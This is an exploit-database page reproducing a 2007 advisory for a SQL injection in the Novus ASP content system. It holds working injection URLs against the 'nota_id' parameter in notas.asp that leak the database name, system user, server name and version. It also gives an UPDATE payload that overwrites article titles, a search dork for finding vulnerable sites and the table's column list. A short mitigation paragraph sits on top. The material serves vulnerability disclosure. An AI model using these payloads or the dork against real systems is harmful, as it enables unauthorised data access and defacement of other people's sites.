header-logo
Suggest Exploit
vendor:
Sistema de administracion y contenido
by:
ka0x, an0de, xarnuz, s0cratex
7.5
CVSS
HIGH
Sql Injection
89
CWE
Product Name: Sistema de administracion y contenido
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: ASP
2007

Novus – Sistema de administracion y contenido.

The Novus system is vulnerable to SQL Injection. By manipulating the 'nota_id' parameter in the 'notas.asp' page, an attacker can execute arbitrary SQL queries. The following SQL injection payloads can be used to extract sensitive information: - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,db_name()) - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,system_user) - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@servername)-- - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@version)--

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize and validate user input before using it in SQL queries. Implementing parameterized queries or prepared statements can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

Novus - Sistema de administracion y contenido.
bug: Sql Inyection.
official site: http://novus.com.mx
d0rk: "Powered by Novus"
free: no
system: asp

bug found by ka0x
D.O.M TEAM
we: ka0x, an0de, xarnuz, s0cratex
ka0x01[at]gmail.com

tables:

1- a_nota.nota_id
2- a_nota.fe_publicacion
3- a_nota.seccion_id
4- a_nota.sub_sec_id
5- a_nota.estatus_id
6- a_nota.fe_alta
7- a_nota.usuario_id
8- a_nota.ultima_hora
9- a_nota.tema_id
10- a_nota.autor
11- a_nota.autor_id
12- a_nota.titulo
13- a_nota.resumen
14- a_nota.texto
15- a_nota.temporal

informacion server:

http://[novus]/notas.asp?nota_id=1+and+1=convert(int,db_name())
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,system_user)
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@servername)--
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@version)--

update table tutulo:

http://[novus]/notas.asp?nota_id=0update+a_nota+set+titulo+=+'Novus Bug Sql Inyection'--

#from spain
-- 
// ka0x

# milw0rm.com [2007-09-26]

Navigation

Suggest Exploit

Services By CQR